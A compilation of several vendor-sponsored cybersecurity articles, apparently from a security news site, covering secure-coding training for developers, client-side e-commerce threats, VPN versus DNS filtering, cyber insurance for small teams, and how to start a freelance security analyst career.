What Developers Need to Fight the Battle Against Common Vulnerabilities

What Developers Need to Fight the Battle Against Common Vulnerabilities

Common Vulnerabilities

Today’s threat landscape is constantly evolving, and now more than ever, organizations and businesses in every sector have a critical need to consistently produce and maintain secure software. While some verticals – like the finance industry, for example – have been subject to regulatory and compliance requirements for some time, we are seeing a steady increase in attention on cybersecurity best practices at the highest levels of government, with the US, UK, and Australia all shining very recent light on the need for secure development at every stage of the SDLC.

Despite this, attackers are constantly finding new ways to bypass even the most advanced protections and defenses. For example, many have shifted their focus from delivering malware to instead compromising APIs, or launching targeted attacks against a supply chain. And while those high-level incidents are happening with much greater frequency, so too are the more simplistic exploits like cross-site scripting and SQL injection, both of which have been a scourge on cybersecurity defenses for decades. Just last month, a critical SQL injection vulnerability was reported in a WooCommerce WordPress plugin, with a 9.8/10 severity rating.

It’s becoming apparent that while cybersecurity platforms and defenses are critical components in defense against modern attacks, what is truly needed is secure code that can be deployed free from vulnerabilities. And that requires a deliberate and committed lift in secure coding standards, actioned by security-aware developers.

Many developers say they are willing to champion security and commit to higher standards of code quality and secure output, but they can’t do it alone. We cannot afford to ignore developer needs in the fight against common vulnerabilities, and they need the support of right-fit tools and training, as well as a reworking of the traditional metrics by which they are often judged by their employers and organizations.

Why Most Developers Don’t Already Prioritize Security

Coding best practices have continued to evolve over the years, in response to business needs and market trends. In the past, most applications were created using the so-called waterfall development model where software engineers worked to get their code ready to meet an ongoing series of milestones or goals before moving on to the next phase of development. Waterfall tended to support the development of programs that, having met all of the previous milestones along the way, were free from bugs or operational flaws by the time they were ready for the production environment. But by today’s standards, it was painfully slow, with sometimes 18 months or more between starting a project and getting to the finish line. And that’s not going to fly in most companies these days.

The agile method tended to replace Waterfall, putting a much greater emphasis on speed. And this was followed by DevOps, which is built for even more speed by combining development and operations together to ensure that programs are ready for production almost as soon as they clear the final development tweaks.

Putting speed over security, and nearly everything else beyond functionality, was a necessity as the business environment evolved. In a cloud-based world where everyone is online all the time, and mobile transactions by the millions can happen every few seconds, getting software deployed and into the continuous integration and continuous delivery (CI/CD) pipeline as quickly as possible is mission critical for businesses.

It’s not that organizations didn’t care about security. It’s just that in the competitive business environment that exists in most industries, speed was seen as more important. And developers who could match that speed thrived to the point where it became the primary means by which their job performance was judged.

Now that advanced attacks are ramping up so dramatically, deploying vulnerable code is becoming a liability. The preference is once again shifting, with security increasingly becoming the primary focus of software development, with speed a close second. Bolting on security after the fact is not only dangerous, it also slows the process of deploying software. That has led to the rise of the DevSecOps methodology that attempts to merge speed and security together to help generate secure code, and consider security as a shared responsibility. But developers trained for pure speed can’t become functionally security-aware without a lot of support from their organizations.

What Developers Need to Truly Make an Impact on Vulnerability Reduction

The good news is that most developers want to see a shift to secure coding and a reprioritizing of security as part of the development process. In a comprehensive survey conducted by Evans Data of over 1,200 professional developers actively working around the world earlier this year, the overwhelming majority said they were supportive of the concept of creating secure code. Most also expected it to become a priority in their organizations. However, only 8% of the respondents said that writing secure code was easy to accomplish. That leaves a lot of room for improvement within most organizations’ development teams between what is needed, and what is required in order to get there.

Simply mandating secure code won’t get the job done, and without effort to build the right skills and awareness, it will be highly disruptive to their workflow. Development teams need to exist in an environment that nurtures their security mindset, and promotes a culture of shared responsibility.

The biggest thing that is needed is better training for them, followed by tools that help make secure coding a seamless part of their workflow. And the program should be customized so that less experienced developers can begin their training by learning how to recognize the kinds of common vulnerabilities that often creep into code, with lots of hands-on learning and examples. Meanwhile, more advanced developers who demonstrate their security skills can instead be tasked with more complex bugs and perhaps even advanced threat modeling concepts.

In addition to funding and supporting training programs, including giving developers enough time away from coding in order to properly participate in those programs, organizations also need to change the way that their cohort is evaluated. The primary metric for rewarding developers needs to shift away from raw speed. Instead, evaluations could reward those who can create secure code that is free from vulnerabilities or exploits. Yes, speed can be an evaluated factor as well, but first and foremost, code needs to be secure, and modern development needs to forge a path where security at speed is no longer a myth.

Shipping insecure or vulnerable code should not be an acceptable business risk, and bolting on security after the fact is becoming increasingly ineffective. Thankfully, the best weapon to fight this disturbing trend is having the developer community produce secure code that attackers can’t exploit. Most developers are willing to step up to that challenge; give them the support to make it happen.

Secure Code Warrior is one of four companies named in the Gartner® Cool Vendors™ in Software Engineering: Enhancing Developer Productivity report. We’re ready to help development teams navigate the complexities of secure software development with tools that make sense in their world. Learn more.

Note — This article is written and contributed by By Matias Madou, CTO & Co-Founder, Secure Code Warrior.

Found this article interesting? Follow us on Twitter and LinkedIn to read more exclusive content we post.
Top Cyber Threats Facing E-Commerce Sites This Holiday Season

Top Cyber Threats Facing E-Commerce Sites This Holiday Season

Delivering a superior customer experience is essential for any e-commerce business. For those companies, there’s a lot at stake this holiday season. According to Digital Commerce 360, nearly $1.00 of every $4.00 spent on retail purchases during the 2022 holiday season will be spent online, resulting in $224 billion in e-commerce sales. To ensure your e-commerce site is ready for the holiday rush, it’s vital to ensure it is secure.

While safety and security are top priorities for businesses of all sizes, it is essential for those who operate in the e-commerce space. To deliver the experience customers crave, many websites embed third-party solutions at every stage of the customer journey. In fact, for certain e-commerce businesses, their suite of third-party plugins is how they create and sustain a competitive advantage.

Yet many e-commerce sites are inherently insecure and vulnerable to attack due to their reliance on untrustworthy third-party solutions. Consequently, client-side security is a weak point for many e-commerce sites, allowing security incidents to occur directly in the browser without the customer realizing it.

Attackers can take advantage of security vulnerabilities on the client side via e-skimming, formjacking, or cross-site scripting. These attacks can compromise customer data, such as credit card numbers, personal information, and login credentials. They can also sometimes lead to financial loss for the e-commerce business and potential regulatory compliance violations.

When an attack involves e-skimming, cybercriminals insert code to skim data from a page that processes a customer’s credit card data. Since this attack occurs on the client side, e-commerce businesses cannot observe the attack firsthand and react quickly.

Many e-commerce sites rely heavily on forms to gather customer data. Formjacking inserts an attacker between the merchant, allowing the attacker to access and record any data that a customer shares via a compromised form.

Cross-site scripting embeds malicious code on the client side. The code runs when a customer visits the site, allowing the attacker to gather the customer’s personal, financial, and session data.

The proliferation of insecure third-party apps and the inability to observe an attack perpetrated via the client side provides attackers with enticing targets to exploit. The fact that attackers use security weaknesses in third-party plugins and not the e-commerce site itself means little, if anything, to an individual who is victimized. Since the attack took place via the website, for most customers, the responsibility for securing the interaction rests with the site owner.

To improve client-side security, e-commerce companies should minimize their reliance on third-party code without impacting the user experience. Deploying well-known third-party solutions with a commitment to security can also help. And, as with every type of software, plugins and apps should receive patches as soon as they become available.

Additionally, simulating cyberattacks that target the e-commerce company’s website can uncover potential attack vectors before criminals can exploit them. Deploying additional layers of customer authentication can add critical layers of security and make it harder for an attacker to compromise a session.

Security software and applications can also harden your defenses and make it harder for attackers to use client-side vulnerabilities to their advantage. These solutions can uncover security flaws and quickly deploy security measures to mitigate vulnerabilities. They can also detect attacks quickly and lessen a company’s exposure to client-side security risks.

When security flaws exist, sophisticated criminals will eventually find and exploit them at a date and time of their choosing. The massive spike in e-commerce traffic during the holiday season provides attackers with the perfect cover to use these flaws in client-side security to steal personal and financial data with impunity.

Customers expect e-commerce sites to protect their personal and financial data. Client-side security is critical to delivering on that commitment. Third-party plugins and applications form the backbone of countless e-commerce sites. Given their prevalence, it’s easy to overlook their inherent risks. Client-side attacks take advantage of flaws and vulnerabilities, yet to the consumer, the responsibility for security rests with the e-commerce site itself.

Yet, when client-side attacks occur via third-party apps, online merchants are often unaware of their flaws and cannot see when attackers use them to their advantage. For many e-commerce businesses, since the vulnerabilities are out of their direct line of sight, they do not receive the attention they deserve.

Attackers aren’t so short-sighted. Where security flaws and vulnerabilities exist, it’s often only a question of time before they are exploited. E-commerce companies must take proactive steps to understand and mitigate the risks of client-side security vulnerabilities. Otherwise, attackers will continue to take advantage of them, leading to a loss of customer trust and confidence and the potential for financial losses and an increase in regulatory oversight.

To learn what your client-side risk profile looks like, and how you can mitigate those risks, visit www.feroot.com

VPN vs. DNS Security

VPN vs. DNS Security

DNS Security

When you are trying to get another layer of cyber protection that would not require a lot of resources, you are most likely choosing between a VPN service & a DNS Security solution. Let’s discuss both.

VPN Explained

VPN stands for Virtual Private Networks and basically hides your IP and provides an encrypted server by redirecting your traffic via a server run by a VPN host. It establishes a protected connection in public networks. It does protect your actions from being seen by your ISP and potential hackers, however, it does not provide full protection and can still let intrusions happen.

Worth noting, VPN does gain access to restricted resources in your region, but bear in mind, it might be collecting your personal data. This problem relates mostly to free and cheap VPN services. In addition to that, VPNs, depending on their type, can proxy requests or not.

Most of the free ones do not even encrypt your data. According to Cybernews, last year 20 million emails and other personal data like location & legal information were stolen via VPN.

DNS Security Explained

DNS Security works exclusively with DNS requests, not traffic. It means that users can control their traffic without the service having any access to it. The main goal of DNS Security is to not let you gain anything from a malicious resource even if you already clicked something. It simply blocks all access to the harmful resource & stops it before anything reaches your network.

What’s the right choice?

Depends on your needs. If you desperately want access to resources that don’t work in your regions, VPN is your choice. Try to pick a trusted one – otherwise, your personal data might get stolen.

However, if you are looking to gain cyber protection & make sure your data stays yours, you should go with DNS Security. As mentioned, it doesn’t have access to your personal information, and does not have both DNS requests and internet traffic go to 3rd-party servers. In short, the main difference is that VPN camouflages the user in the danger zone. DNS Security, however, by means of DNS filtering does not let the user go into it at all, therefore, not risking the user at all.

DNS filtering can be thought of as a way-too-simple-to-protect kind of solution, but it does the trick, especially by being so easy & simple.

SafeDNS has just updated the cybersecurity categories & implemented real-time statistics, so your browsing, whether at your business or at home, can get even more secure.

You can always start your free trial for 15 days to get the taste of cybersecurity.

Alternatively, you can check out our Unified Threat Management solution if you are searching for multi-layered protection.

A Quick Guide for Small Cybersecurity Teams Looking to Invest in Cyber Insurance

A Quick Guide for Small Cybersecurity Teams Looking to Invest in Cyber Insurance

Small Cybersecurity Teams

In the world of insurance providers and policies, cyber insurance is a fairly new field. And many security teams are trying to wrap their heads around it.

What is it and do they need it? And with what time will they spend researching how to integrate cyber insurance into their strategy?

For small security teams, this is particularly challenging as they contend with limited resources.

Luckily, there’s a new eBook dedicated to helping small security teams better understand cyber insurance policies and how they may impact an organization’s cybersecurity measures.

Background

In 1997, the “Internet Security Liability” (ISL) insurance policy was launched at the International Risk Insurance Management Society’s convention in Honolulu. Underwritten by AIG, ISL insurance was designed to protect ecommerce retailers like Amazon that were collecting sensitive customer data and storing it on internal networks. It is credited as one of the very first cyber insurance policies to be made available to businesses.

Now, a quarter of a century later, the cyber insurance market has grown exponentially and covers a wide range of cybersecurity incidents. According to the National Association of Insurance Commissioners (NAIC), the cybersecurity insurance market hit $4.1 billion last year, up 29.1% over the previous year. Industry reports predict the market will reach $11.4 billion by the end of this year – and nearly double to $22.3 by 2025.

“Last year was a stark reminder that hackers are pivoting — and are succeeding — in deploying new attack strategies,” writes John Farley, managing director of Gallagher, a global insurance consultancy. “There were a wide variety of victims that ranged from global software providers, email platforms, the largest U.S. meat supplier and fuel suppliers that provides nearly half the fuel to the east coast of the U.S. Threat actors have found this vase system of interdependencies to be fertile hunting grounds.”

Organizations with even the smallest cybersecurity teams are now looking at cyber insurance to protect their businesses from cyber attacks.

But investing in cyber insurance is not as easy as adding a new insurance policy.

What is cyber insurance?

Cyber insurance, also referred to as cyber liability insurance or data breach insurance, can help mitigate the costs of cyber attacks – an expense that is growing at an alarming rate. While still not a mandatory expense, cyber insurance is quickly rising to the top of priority lists for many organizations that manage vast amounts of data.

Because a cybersecurity attack can cost a business millions of dollars – IBM reports the average cost of a data breach reached $4.35 million in 2022 – businesses that do not invest in cyber insurance are putting their entire enterprise at risk. A cyber insurance policy does not stop a cyber attack, but it can prevent it from completely devastating a business.

What does cyber insurance cover?

As with any insurance policy, there are different forms of cyber insurance that cover various cyber security threats. The market varies widely, with policies often determined by insurance providers, but the primary forms of cyber insurance include:

  1. Network security systems policies which cover the cost of lawyers, IT forensic services, data restoration, breach notifications and communications, and more when a data breach, malware infection or ransomware incident occurs.
  2. Privacy liability policies which cover any costs related to a data breach that exposes personally identifiable information (PII), i.e. lawsuits, compliance violations, reputational risk management, etc.
  3. Network business interruption policies that enable a business to cover costs related to data loss or any financial losses incurred by a disruption in services.
  4. Errors and omissions policies that are similar to network business interruption policies, covering cyber attacks that jeopardize a businesses’ ability to deliver services or meet contractual obligations.
  5. Media liability policies which cover any losses resulting from allegations of slander, libel, disparagement, or copy infringement.

This is not a complete list of cyber insurance policies. Specific terms and conditions are up to insurance providers, with claims often disputed as it can be difficult to define a cyber attack that involves sophisticated forms of cybercrime or social engineering schemes which are difficult to identify.

How do existing cybersecurity efforts impact cyber insurance policies?

Before obtaining a cyber insurance policy, businesses must be approved for coverage. To protect their own costs, insurance providers often make cyber insurance contingent on a number of specific cybersecurity measures.

These contingencies usually include a business’ cybersecurity efforts – things like making sure an organization has written security policies in place, uses multi-factor authentication (MFA), and encrypts their data. Often cyber insurance providers dictate which cybersecurity tools a business must implement and even security vendors the business chooses to partner with.

Such rules set by the cyber insurance provider directly impacts an organization’s cybersecurity efforts and can create friction between cybersecurity teams and the business leaders purchasing the cyber insurance policy. The best path to reducing this friction is to make sure the cybersecurity team is on board with the process from the start and involved in key decisions that impact the business’ cybersecurity strategy.

Cybersecurity team leads need to understand cyber insurance policies and be able to assess whether or not a tactic required by an insurance provider weakens or strengthens the business’ existing cybersecurity protections.

If your organization is currently evaluating cyber insurance policies, download Cynet’s insurance guide to better understand what’s at stake – both for your cybersecurity team and your business at large.

Download Cynet’s Small Security Team’s Guide to Cyber Insurance.

How To Build a Career as a Freelance Cybersecurity Analyst — From Scratch

How To Build a Career as a Freelance Cybersecurity Analyst — From Scratch

Cybersecurity Analyst

With each passing year, the cybersecurity threat landscape continues to worsen. That reality makes cybersecurity analysts some of the most sought-after technology professionals in the world. And there are nowhere near enough of them to meet the demand. At last count, there were over 3.5 million unfilled cybersecurity jobs worldwide — and that number is still growing.

The situation means that it’s a great time to become a cybersecurity analyst. What’s more, the skyrocketing demand means it’s possible to start a lucrative freelance career in the field and take complete control over your professional future. Here’s a start-to-finish guide on how to do exactly that.

Start With the Right Training

The first step on the path to becoming a freelance cybersecurity analyst is to acquire the necessary skills. For those without an existing technology background, the best place to start is with a cybersecurity bootcamp. They’re designed to get newcomers up to speed with basic cybersecurity concepts and skills in the shortest possible time.

A great place to start your search for the right course is Bootcamps.org. They maintain an active directory of both free and paid bootcamp programs in a variety of technology fields, including cybersecurity. Depending on your preexisting familiarity with computing concepts, you may also wish to enroll in a more generalized computing bootcamp to get started.

Your goal is to emerge from these programs with a working knowledge of the following concepts:

  • Networking architecture and design
  • Networking, routing and switching hardware and systems
  • Firewalls and packet sniffing systems
  • Threat detection and analysis methods
  • Common network and software vulnerability types

Earn One or More Cybersecurity Certifications

The next thing you’ll need to do is to earn one or more cybersecurity certifications to demonstrate your abilities to would-be employers. The best approach is to begin with a general cybersecurity certification. You can always earn a more specialized certification later in your career after you gain experience and figure out which aspects of the job you excel at. The most popular general cybersecurity certifications include:

Earning any one of the above certifications will give you the credentials you need to qualify for thousands of already-existing open positions. At the time of this writing, there are over 200,000 active job listings for holders of the above certifications on LinkedIn, Indeed, and Simply Hired alone. In other words — you’ll be ready to join the ranks of professional cybersecurity analysts the moment you’ve earned one of them.

Gameplan to Gain Experience

Even though it’s possible to get some cybersecurity analyst jobs with nothing but the right certifications and an artfully-worded resume — that will only get you so far. Although it’s reasonable to take on an entry-level cybersecurity position to gain some experience at this stage, there are also some other strategies you can use to speed up the process.

One of them is to explore resources like TryHackMe.com. It’s a site with real-world hacking simulations that you can use to get some hands-on experience with the kinds of situations you’ll face as a cybersecurity analyst. It’s an excellent way to build some experience without any risk.

Another strategy you should consider is to attend as many hackathons as you can. Those will give you a front-row seat to see how the best of the best in cybersecurity approach their work. And, they make for excellent networking opportunities that you’ll need to prepare yourself to go freelance later.

At this stage, you should also set yourself up with accounts on all of the major cloud providers like Google, Amazon AWS, and Microsoft Azure. This will allow you to build technology stacks on each platform and familiarize yourself with their settings and features. The majority of businesses in the world today have at least some exposure to one or more of those platforms. Understanding them from a cybersecurity perspective will improve your marketability as a freelance cybersecurity analyst.

Take On Small Paid Jobs

When you feel comfortable enough in your skill set and experience level to consider transitioning into freelance roles, you should start small. This means taking on some paid cybersecurity jobs through sites like Fiverr and Upwork. You should begin by offering your services in specific areas that your existing experience supports. So, if you feel comfortable conducting penetration testing of a particular app or platform, start there.

The idea is for you to establish yourself as a reliable service provider on those sites. Although it may not seem like you’re getting far — after all, freelance sites aren’t where the real money is — you’ll be building up a reputation for quality work. When you’ve done that, you can parlay that reputation into more lucrative work.

Prepare Your Freelance Business

Once you’ve got enough experience and have a solid resume of small freelance cybersecurity jobs under your belt, you’ll be ready to turn your hard work into a standalone freelance business. The first step toward doing that is to think up a business name. You’ll want a name that’s not already in use, with an available domain name to match. When you have one, reserve the domain name and register for a tax ID with the relevant authorities where you’re planning to work.

Next, you’ll want to design a website to serve as a calling card for your business. Since you’ll be marketing your skills and reputation as a cybersecurity analyst, the site doesn’t need to be anything more than a professional-looking portal with your business name, basic information, and contact details. You can choose a ready-made template if you don’t have the design skills to do the job yourself.

Then, you’ll want to set up your home office with everything you’ll need to work full-time. This means having a dedicated comfortable space with a desk and computer, and all of the relevant office supplies. It’s also a good idea to sign up for a business phone app so you’ll have a professional communications system for your customers to contact you.

Turn To Your Professional Network

At this point, you’re ready to begin soliciting work as a freelance cybersecurity analyst. This is the time when all of the networking you’ve done through hackathons and other events, as well as through your freelance portal jobs, will pay off. You should begin by crafting an announcement of your new business to send out to all of the contacts you’ve collected.

As you do this, be sure to let everyone know exactly what types of cybersecurity jobs you’re equipped to handle. You should also make it clear how potential clients can contact you and request quotes for your services. If you’ve done everything right, you should start to get inquiries in short order. From there, all you have to do is your best work — and it won’t be long until you have enough steady customers that you can quit your day job and go freelance for good.

The Takeaway

The simple fact is, the sheer volume of open cybersecurity jobs — and the countless more that will appear in the next few years — make your odds of success as a freelance cybersecurity analyst quite high. As long as you’re competent, confident, and willing to continue to learn your trade as you work, you’ll never run out of opportunities. Your reward for all of that is a well-paid career with a schedule that you control — and doesn’t that sound like a dream come true?